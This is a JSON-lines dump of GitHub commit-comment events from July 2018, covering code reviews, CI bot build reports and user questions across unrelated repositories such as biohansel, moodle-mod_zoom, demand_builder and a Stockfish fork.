{"id":"7978858849","type":"CommitCommentEvent","actor":{"login":"iridianperez012"},"repo":{"name":"giagiannis/anonymity"},"payload":{"comment":{"id":29739972,"position":null,"line":null,"path":null,"commit_id":"862139a1a018bf745fcdb0e85028fe561ea4df8d","created_at":"2018-07-17T19:44:20Z","updated_at":"2018-07-17T19:44:20Z","author_association":"NONE","body":"Can you anonymize with another file? or are necessarily those that count...  If so, what do I need to change to run the program?"}},"created_at":"2018-07-17T19:44:20Z"}
{"id":"7978860419","type":"CommitCommentEvent","actor":{"login":"YannickDieter"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29739974,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T19:44:40Z","updated_at":"2018-07-17T19:44:40Z","author_association":"COLLABORATOR","body":"Concerning the expansion of `last_frame_id` and `last_timestamp` for each plane: At the moment this is not possible since (as it is now) we do not know to which plane data we assign the TLU timestamp. But if we move the correlation of Mimosa26 data and TLU timestamps also here to the raw data interpretation and make this on-the-fly it should be possible to distinguish these two variables for each plane."}},"created_at":"2018-07-17T19:44:40Z"}
{"id":"7978862347","type":"CommitCommentEvent","actor":{"login":"mpavlak1"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29739977,"position":null,"line":null,"path":null,"commit_id":"e2446b99646f986e8c77c47d0bd741be6e500606","created_at":"2018-07-17T19:45:02Z","updated_at":"2018-07-17T19:45:02Z","author_association":"CONTRIBUTOR","body":"Tried to make demand_builder completely automated and not even need the input-map file describing which files are what type.\r\n\r\nWas able to determine which files where MAP and CONSOLIDATED based on header. These files should also only have one sheet. \r\nIf the file is not either a MAP or CONSOLIDATED, \r\n it should be a FORGE and contain Unit_Node_Detail or SRC_By_Day sheet \r\n (Unit_Node_Detail always used first, SRC_By_Day only used when it does not exist)\r\n\r\nAn exception will be thrown asking for the user's input if the MAP or CONSOLIDATED contain multiple sheets or FORGE does not have either sheets.\r\n\r\nDetermining which ForceCode is associated with each FORGE might still cause problems (produce logical errors, will run fine).\r\nNowhere in the FORGE files does it indicate what scenario the file is for.\r\nThe only data I could use to try to guess which file is each FC was to use the filename and duration.\r\n\r\nCreated a heuristic that matches FORGE files to FCs listed in the map by adding the amount different the FC is from the filename \r\nand the difference between the duration of the FORGE and durations listed in the map (squared this value to give it more weight, can adjust as needed).\r\nOnce a FC is matched to a FORGE, it can't be matched again (no duplicate FCs for FORGEs). \r\n\r\nNeed to add a gui displaying the matching demand_builder came up with and the ability for the user to verify and adjust any of the incorrect automated matches. \r\nNeed to also clean up some up some of the stuff in m4plugin.\r\n\r\nStill working on a way to be able to read the SRC_By_Day sheet without needing to override the tabular-region function. \r\n\r\nAlso, there was a potential error when formatting the vignettes. Did not account for when vignettes have multiple runs (0-100 and then 200-300). \r\nThis should be fixed now.\r\n   \r\nStarted working on the slides a little. Still unsure what level exactly to talk about demand_builder.\r\n\r\n-----Original Message-----\r\nFrom: fs-tom [mailto:notifications@github.com] \r\nSent: Tuesday, July 17, 2018 3:30 PM\r\nTo: fsdonks/demand_builder <demand_builder@noreply.github.com>\r\nCc: Pavlak, Michael M CIV (US) <michael.m.pavlak.civ@mail.mil>; Mention <mention@noreply.github.com>\r\nSubject: [Non-DoD Source] Re: [fsdonks/demand_builder] completely automated from root (e2446b9)\r\n\r\nAll active links contained in this email were disabled. Please verify the identity of the sender, and confirm the authenticity of all links contained within the message prior to copying and pasting the address to a Web browser. \r\n\r\n\r\n________________________________\r\n\r\n\r\n\r\n\r\n@mpavlak1 < Caution-https://github.com/mpavlak1 >  @fs-craig < Caution-https://github.com/fs-craig > \r\n\r\n1.\tAvoid using :refer-all....this occludes where your symbols came from in the source. It's a few extra bits to use the ns alias like doc/.... or xl/...., and it helps other people read/maintain your code significantly. Alternately...if you're only pulling in a few functions....then :refer [fn1 fn2 ....] is more acceptable since readers can scan up to the NS to find undefined, non-clojure.core functions that are used in the body.\r\n\r\n2.\tbetter idiom then (first (filter #(= \"blah\" %) xs)) is (some #{\"blah\"} coll).\r\n\r\n3.\tdon't need to coerce to tabdelimited to get records in sheet->records. tbl/table-records can be called to get a record sequence directly on a table. spork.util.tables are also reducible, acting like a sequence of records ala tbl/table-records. You do this in file->records and sheet->records.\r\n\r\n4.\tread-sheet is redefined multiple times....\r\n\r\n5.\theader-count: maybe pull out the repeated calls to (set ....) into a let binding, compute the set once, then re-use it. I don't think the compiler is sufficiently smart enough to do that for you (could be wrong).\r\n\r\n6.\tyou're slinking back to interop.....use functions in java.util.io and spork.util.io, like jio/delete-file or io/delete-file-recursively (works on single files and directories). Use io/file (it's got portable path processing, posix friendly). io/list-files also exists.\r\n\r\n7.\tuse cond or case (or even 'or/and ) instead of nested ifs....\r\n\r\n8.\tin root->inputmap, you're holding onto the head of a lazy sequence in the let binding for lines. This may not matter here, but if the sequence is big enough, it won't be GC'd dynamically (defeating one purpose of laziness). If you moved that to the do-seq binding, it would be generated and consumed on demand, and GC'd along the way (i.e. you could work over large files without blowing up the heap). May not matter in this case.\r\n\r\n9.\tWhat's fc-weight for? Looks sketchy....\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub < Caution-https://github.com/fsdonks/demand_builder/commit/e2446b99646f986e8c77c47d0bd741be6e500606#commitcomment-29739814 > , or mute the thread < Caution-https://github.com/notifications/unsubscribe-auth/AcICZwohDJnGIInofSeqP9ateJnt3mEQks5uHjsegaJpZM4VTbTC > . <Caution-https://github.com/notifications/beacon/AcICZ5oqHEUk026aZ6J9_dW-SMAqpJQ3ks5uHjsegaJpZM4VTbTC.gif> \r\n\r\n"}},"created_at":"2018-07-17T19:45:02Z"}
{"id":"7978862368","type":"CommitCommentEvent","actor":{"login":"melissamas"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29739979,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T19:45:03Z","updated_at":"2018-07-17T19:45:03Z","author_association":"NONE","body":"I am having some issues getting my text editor to communicate with my command console. When I type \"python calc.py\" I am getting 'python'is not recognized as an internal or external command, operable program or batch file. I am a gold member as well. How do I find out who my mentor is so I can get further help?"}},"created_at":"2018-07-17T19:45:03Z"}
{"id":"7978864858","type":"CommitCommentEvent","actor":{"login":"rubensaraldao"},"repo":{"name":"rubensaraldao/angular"},"payload":{"comment":{"id":29739984,"position":null,"line":null,"path":null,"commit_id":"dd6287064c858e32485785dca7d7336723e90395","created_at":"2018-07-17T19:45:31Z","updated_at":"2018-07-17T19:45:31Z","author_association":"OWNER","body":"routerLinkActive in src/app/app.component.html doesn't work... sniff snif :("}},"created_at":"2018-07-17T19:45:31Z"}
{"id":"7978868157","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29739986,"position":null,"line":null,"path":null,"commit_id":"03f681a69a86ef887243ffefb5d021a00c46af53","created_at":"2018-07-17T19:46:10Z","updated_at":"2018-07-17T19:46:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T19:46:10Z"}
{"id":"7978873650","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29739990,"position":null,"line":null,"path":null,"commit_id":"89e894af3d5313ca0b67c08b620cb7479a8c8349","created_at":"2018-07-17T19:47:18Z","updated_at":"2018-07-17T19:47:18Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.07 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |     1    |\n| `texts_total`      |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +7847 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                            | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                            | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                     | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4466)*\n"}},"created_at":"2018-07-17T19:47:18Z"}
{"id":"7978878043","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29739998,"position":30,"line":25,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-17T19:48:14Z","updated_at":"2018-07-17T19:48:14Z","author_association":"COLLABORATOR","body":"What if your reference sequence isn't a single sequence, but has multiple sequences (e.g. multiple chromosomes or some plasmids)?"}},"created_at":"2018-07-17T19:48:14Z"}
{"id":"7978881189","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29740003,"position":26,"line":21,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-17T19:48:51Z","updated_at":"2018-07-17T19:48:51Z","author_association":"COLLABORATOR","body":"What is `key`? What is `value`? Can you come up with more descriptive names for these vars?"}},"created_at":"2018-07-17T19:48:51Z"}
{"id":"7978883012","type":"CommitCommentEvent","actor":{"login":"sivareddy66"},"repo":{"name":"sivareddy66/ramesh"},"payload":{"comment":{"id":29740007,"position":null,"line":null,"path":null,"commit_id":"7a883f20710e7ce9bcb7bfc56e27356162cb6ffa","created_at":"2018-07-17T19:49:13Z","updated_at":"2018-07-17T19:49:13Z","author_association":"OWNER","body":"ewjdsicjdsoodpvrec"}},"created_at":"2018-07-17T19:49:13Z"}
{"id":"7978885144","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29740010,"position":10,"line":9,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-17T19:49:38Z","updated_at":"2018-07-17T19:49:38Z","author_association":"COLLABORATOR","body":"You are returning `results_dict` so shouldn't the return type annotation be `Dict[str, pd.DataFrame]`?"}},"created_at":"2018-07-17T19:49:38Z"}
{"id":"7978885727","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740012,"position":null,"line":null,"path":null,"commit_id":"1f056b7ca98794257558b0a9fe6e0e6e3b699b03","created_at":"2018-07-17T19:49:45Z","updated_at":"2018-07-17T19:49:45Z","author_association":"NONE","body":"TeamCity Plugins :: CSV [Build 77](http://ci.n5o.green/viewLog.html?buildId=1587&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: 1 muted problem Build time: 00:00:55"}},"created_at":"2018-07-17T19:49:45Z"}
{"id":"7978886994","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740013,"position":null,"line":null,"path":null,"commit_id":"89cfd5cecc6c52b7469eb17a5b7d96348294fe6e","created_at":"2018-07-17T19:50:02Z","updated_at":"2018-07-17T19:50:02Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/89cfd5cecc6c52b7469eb17a5b7d96348294fe6e/.circleci/config.yml)\n"}},"created_at":"2018-07-17T19:50:02Z"}
{"id":"7978889174","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29740018,"position":null,"line":null,"path":null,"commit_id":"4925a9910a5e54167952a07830519e835d58c187","created_at":"2018-07-17T19:50:28Z","updated_at":"2018-07-17T19:50:28Z","author_association":"NONE","body":"@candirufish  I see you pushed three tests with your tuned values.\r\n\r\nIn none of them did you set PassedDanger[2] = 0 and mPassedFile[1] = 0\r\nwhich was the thing to do. \r\n\r\nLet me explain again.\r\n\r\nYou can see by yourself that no option was created for those 2\r\nas follow:\r\na) build your exe used for spsa\r\nb) run your exe and type\r\nuci\r\nand press enter\r\n\r\nc) you will see that PassedDanger[2]  and mPassedFile[1] are not listed as options.\r\nd) Which means that whatever the spsa values, there was no way for the exe to read those 2 values\r\ne) Which means they were 0 (the original value) throughout the test.\r\n\r\n\r\nThe reason for them not being listed is that you used\r\ninline Range strict_range(double v) {  \r\n  return v == 0 ? Range(0, 0) : Range(v - 3, v + 3);  \r\n}\r\n\r\nand\r\ninline Range b_range(double v) {  \r\n  return v == 0 ? Range(0, 0) : Range(v - 30, v + 30);  \r\n}  \r\n  \r\nwhich clearly return Range(0,0) if the initial value is 0\r\n\r\nAnd since tuning code have the following\r\n```\r\nstatic void make_option(const string& n, int v, const SetRange& r) {  \r\n\r\n// Do not generate option when there is nothing to tune (ie. min = max)  \r\nif (r(v).first == r(v).second)  \r\n     return;  \r\n\r\n...\r\n}\r\n```\r\n"}},"created_at":"2018-07-17T19:50:28Z"}
{"id":"7978890656","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740022,"position":null,"line":null,"path":null,"commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T19:50:47Z","updated_at":"2018-07-17T19:50:47Z","author_association":"MEMBER","body":"@Rohanator9000 Make sure there is a corresponding branch on ucla/moodle as well"}},"created_at":"2018-07-17T19:50:47Z"}
{"id":"7978895061","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29740028,"position":90,"line":65,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-17T19:51:43Z","updated_at":"2018-07-17T19:51:43Z","author_association":"COLLABORATOR","body":"I find that sometimes you need to be careful with multiline strings and whitespace. Sometimes due to wanting nice indentation, you get a bunch of spaces/tabs added to some lines. "}},"created_at":"2018-07-17T19:51:43Z"}
{"id":"7978897495","type":"CommitCommentEvent","actor":{"login":"sivareddy66"},"repo":{"name":"sivareddy66/ramesh"},"payload":{"comment":{"id":29740030,"position":null,"line":null,"path":null,"commit_id":"51ee6a4a46d3176092e76974f1dcfe472bc09017","created_at":"2018-07-17T19:52:15Z","updated_at":"2018-07-17T19:52:15Z","author_association":"OWNER","body":"vhvjl';',knbjbkl;';."}},"created_at":"2018-07-17T19:52:15Z"}
{"id":"7978898162","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740031,"position":136,"line":240,"path":"locallib.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T19:52:23Z","updated_at":"2018-07-17T19:52:23Z","author_association":"MEMBER","body":"@Rohanator9000 Why are you creating your own delete file? Call Moodle's because it does the callbacks to delete the calendar/etc. Also, it does other stuff that is not in your delete.php file like deleting the context and entry in course_modules table."}},"created_at":"2018-07-17T19:52:23Z"}
{"id":"7978899143","type":"CommitCommentEvent","actor":{"login":"aralap"},"repo":{"name":"aralap/biopython"},"payload":{"comment":{"id":29740033,"position":null,"line":null,"path":null,"commit_id":"5bfd5983893d8b2c9953c669e27ca56a9f51871c","created_at":"2018-07-17T19:52:35Z","updated_at":"2018-07-17T19:52:35Z","author_association":"OWNER","body":"Test for minimal meme parser"}},"created_at":"2018-07-17T19:52:35Z"}
{"id":"7978901001","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29740037,"position":79,"line":58,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-17T19:52:57Z","updated_at":"2018-07-17T19:52:57Z","author_association":"COLLABORATOR","body":"`attribute_value` is very generic and doesn't describe what this var is. `row.iloc[3]` doesn't provide any hints as to what it could be either."}},"created_at":"2018-07-17T19:52:57Z"}
{"id":"7978903234","type":"CommitCommentEvent","actor":{"login":"agnspy"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740039,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T19:53:22Z","updated_at":"2018-07-17T19:53:22Z","author_association":"NONE","body":"Hi, you should probably reinstall Python. That's what worked for me. Seems like more people had the same issue. When you're installing it again make sure you select PATH box at the beginning and disable at the end. Provided you're a Microsoft user this should work."}},"created_at":"2018-07-17T19:53:22Z"}
{"id":"7978906085","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740043,"position":6,"line":70,"path":"lang/en/zoom.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T19:53:57Z","updated_at":"2018-07-17T19:53:57Z","author_association":"MEMBER","body":"@Rohanator9000 Do you need to mention V2?"}},"created_at":"2018-07-17T19:53:57Z"}
{"id":"7978906439","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29740045,"position":7,"line":7,"path":"ccr5_ccl5_il10ra.cypher","commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T19:54:01Z","updated_at":"2018-07-17T19:54:01Z","author_association":"COLLABORATOR","body":"so here switch back to full_name"}},"created_at":"2018-07-17T19:54:01Z"}
{"id":"7978908457","type":"CommitCommentEvent","actor":{"login":"OliviaZhi"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29740050,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-17T19:54:26Z","updated_at":"2018-07-17T19:54:26Z","author_association":"NONE","body":"Oops, it seems working now. Thank you so much.\r\nbtw, can I ask your training time?\r\nThx!"}},"created_at":"2018-07-17T19:54:26Z"}
{"id":"7978910220","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29740055,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T19:54:46Z","updated_at":"2018-07-17T19:54:46Z","author_association":"MEMBER","body":"When testing with python3, I'm getting segfault during import. Even with these changes.\r\n`from libpyTypeConverter2 import EMNumPy`\r\n\r\nThe problem could with my python3 evironment, but wanted to let you know."}},"created_at":"2018-07-17T19:54:46Z"}
{"id":"7978912365","type":"CommitCommentEvent","actor":{"login":"bitshop"},"repo":{"name":"commaai/openpilot"},"payload":{"comment":{"id":29740060,"position":null,"line":null,"path":null,"commit_id":"19812e0b16f08ccc8f5bf1798862a96cbedbd6c5","created_at":"2018-07-17T19:55:11Z","updated_at":"2018-07-17T19:55:11Z","author_association":"NONE","body":"@mtourangeau sure, but why? The Prius has nice resistance on wheel and when you let go just that resistance steers.. ie you know you need to steer because car is still trying to. Tesla EPAS won't behave that way so instead it disengages until we re reengage it (which is hard to get smooth). "}},"created_at":"2018-07-17T19:55:11Z"}
{"id":"7978920538","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740072,"position":94,"line":100,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T19:56:47Z","updated_at":"2018-07-17T19:56:47Z","author_association":"MEMBER","body":"@Rohanator9000 Since we are requiring the URL to be V2, can we have some upgrade code that will update the 'apiurl' config to the v2 url?\r\n\r\nhttps://docs.moodle.org/dev/Upgrade_API"}},"created_at":"2018-07-17T19:56:47Z"}
{"id":"7978922650","type":"CommitCommentEvent","actor":{"login":"oluyoung"},"repo":{"name":"dimashmundiak/node-paypal-sub"},"payload":{"comment":{"id":29740074,"position":null,"line":null,"path":null,"commit_id":"448f2f5d92b9da8f5d71eb048a6c96ea0dcc5ec9","created_at":"2018-07-17T19:57:12Z","updated_at":"2018-07-17T19:57:12Z","author_association":"NONE","body":"did you make the webhooks work, do they printout information?"}},"created_at":"2018-07-17T19:57:12Z"}
{"id":"7978922844","type":"CommitCommentEvent","actor":{"login":"jxnblk"},"repo":{"name":"jxnblk/styled-system"},"payload":{"comment":{"id":29740075,"position":null,"line":null,"path":null,"commit_id":"764800ad06658445468e76750e640192050bfb60","created_at":"2018-07-17T19:57:14Z","updated_at":"2018-07-17T19:57:14Z","author_association":"OWNER","body":"@avidrucker yes, you can clone the repo and run each example locally. They are built with create-react-app"}},"created_at":"2018-07-17T19:57:14Z"}
{"id":"7978925138","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29740077,"position":null,"line":null,"path":null,"commit_id":"00a522d539677c1c3d969dd86f20955687174389","created_at":"2018-07-17T19:57:39Z","updated_at":"2018-07-17T19:57:39Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Řešení náhradníků, co dorazí](https://trello.com/c/qA9IsBj4/655-2-%C5%99e%C5%A1en%C3%AD-n%C3%A1hradn%C3%ADk%C5%AF-co-doraz%C3%AD)"}},"created_at":"2018-07-17T19:57:39Z"}
{"id":"7978925945","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29740080,"position":null,"line":null,"path":null,"commit_id":"c1ce25ba492b38625a34e0b7fa633db96611374d","created_at":"2018-07-17T19:57:47Z","updated_at":"2018-07-17T19:57:47Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-2](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-17T19:57:47Z"}
{"id":"7978928240","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29740085,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T19:58:16Z","updated_at":"2018-07-17T19:58:16Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2405 of 2975 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 566 tests had: Table big diffs.\n * 75 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 169 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 103 tests had: MTR small diffs.\n * 36 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.84%25-red.png)</a> \n"}},"created_at":"2018-07-17T19:58:16Z"}
{"id":"7978936336","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740097,"position":null,"line":null,"path":null,"commit_id":"89cfd5cecc6c52b7469eb17a5b7d96348294fe6e","created_at":"2018-07-17T19:59:53Z","updated_at":"2018-07-17T19:59:53Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2t](https://circleci2t-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/89cfd5cecc6c52b7469eb17a5b7d96348294fe6e/.circleci/config.yml)\n"}},"created_at":"2018-07-17T19:59:53Z"}
{"id":"7973895835","type":"CommitCommentEvent","actor":{"login":"XUSushi"},"repo":{"name":"XUSushi/wordlist"},"payload":{"comment":{"id":29728868,"position":null,"line":null,"path":null,"commit_id":"dc0154b7eaab792bf2fa92f1ec62c1041f731ef3","created_at":"2018-07-17T02:00:37Z","updated_at":"2018-07-17T02:00:37Z","author_association":"OWNER","body":"更新后：\r\n用户可以输入数字n，打印Top n 或 Last n 词频排序。"}},"created_at":"2018-07-17T02:00:37Z"}
{"id":"7973899668","type":"CommitCommentEvent","actor":{"login":"Larrymuters8"},"repo":{"name":"jemcode/rails_admin_history_rollback"},"payload":{"comment":{"id":29728879,"position":null,"line":null,"path":null,"commit_id":"90780fdccce9b9f705d94119736a8e97477a2743","created_at":"2018-07-17T02:01:59Z","updated_at":"2018-07-17T02:01:59Z","author_association":"NONE","body":"21c1442f"}},"created_at":"2018-07-17T02:01:59Z"}
{"id":"7973905538","type":"CommitCommentEvent","actor":{"login":"remkop"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":29728904,"position":null,"line":null,"path":null,"commit_id":"a798866fcfd98f7b2cd46e948b37217a8349f609","created_at":"2018-07-17T02:04:17Z","updated_at":"2018-07-17T02:04:17Z","author_association":"CONTRIBUTOR","body":"Thanks for the heads up!\r\nThe test fails because of a change in the error message format. I’ll fix it tonight and I’ll make sure to run the tests before pushing changes in the future. "}},"created_at":"2018-07-17T02:04:17Z"}
{"id":"7973906181","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728908,"position":null,"line":null,"path":null,"commit_id":"d406755c597e253fdbcced12c46d7639ade471b9","created_at":"2018-07-17T02:04:31Z","updated_at":"2018-07-17T02:04:31Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 543](https://ci.hashicorp.engineering/viewLog.html?buildId=104489&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-17T02:04:31Z"}
{"id":"7973907003","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728914,"position":null,"line":null,"path":null,"commit_id":"d406755c597e253fdbcced12c46d7639ade471b9","created_at":"2018-07-17T02:04:49Z","updated_at":"2018-07-17T02:04:49Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 543](https://ci.hashicorp.engineering/viewLog.html?buildId=104489&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:17"}},"created_at":"2018-07-17T02:04:49Z"}
{"id":"7973926257","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728976,"position":null,"line":null,"path":null,"commit_id":"3ec9f69e89ee861dc7858d460119f26ab32b677b","created_at":"2018-07-17T02:11:59Z","updated_at":"2018-07-17T02:11:59Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nmissed comma between flow collection entries at line 6, column 23:\n                   then: '${event.clone_url}'}\n                          ^\n\n</details>"}},"created_at":"2018-07-17T02:11:59Z"}
{"id":"7973927106","type":"CommitCommentEvent","actor":{"login":"vadimsht"},"repo":{"name":"chromedp/chromedp"},"payload":{"comment":{"id":29728978,"position":26,"line":26,"path":"runner/path_windows.go","commit_id":"622c90c82cac39a3f2be4376f4ea298c8d651df4","created_at":"2018-07-17T02:12:18Z","updated_at":"2018-07-17T02:12:18Z","author_association":"NONE","body":"Note that findEdgePath is still referenced from runner_windows.go. This change broke windows build.\r\n\r\n"}},"created_at":"2018-07-17T02:12:18Z"}
{"id":"7973930017","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728981,"position":null,"line":null,"path":null,"commit_id":"f3bc7ec08c5445f60a8968bd2f406e4436fd7086","created_at":"2018-07-17T02:13:31Z","updated_at":"2018-07-17T02:13:31Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property head\n\n</details>"}},"created_at":"2018-07-17T02:13:31Z"}
